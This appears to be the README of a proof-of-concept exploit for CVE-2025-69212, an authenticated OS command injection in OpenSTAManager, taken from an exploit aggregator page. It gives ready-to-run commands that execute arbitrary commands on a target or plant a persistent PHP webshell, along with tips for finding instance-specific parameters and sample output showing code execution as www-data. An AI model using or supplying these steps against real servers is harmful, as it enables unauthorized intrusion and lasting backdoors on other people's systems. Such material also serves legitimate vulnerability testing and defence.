## https://sploitus.com/exploit?id=F59E18E1-8D28-5DFC-B6C7-B647B9B2BC1E
# CVE-2025-69212 - OpenSTAManager OS Command Injection PoC
## Usage
Install dependencies:
```bash
pip install -r requirements.txt
```
Run a single command and print its output:
```bash
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
```
Drop a persistent PHP webshell instead:
```bash
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
```
### Options
| Flag | Description |
|---|---|
| `-u, --url` | Base URL of the target instance |
| `-U, --username` | Username for authentication |
| `-P, --password` | Password for authentication |
| `-c, --command` | Command to execute, output saved to `pwn_out.txt` |
| `--shell` | Drop a PHP webshell at `files/shell.php` instead of running a single command |
| `--id-module` | Module ID for the invoice import feature (default: 14) |
| `--id-plugin` | Plugin ID for the invoice import feature (default: 48) |
`id_module` and `id_plugin` are instance-specific. If the defaults do not work, log into the target's web UI, navigate to the electronic invoice import feature, and check the request parameters in your browser's network tab.
### Example Output
```
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
```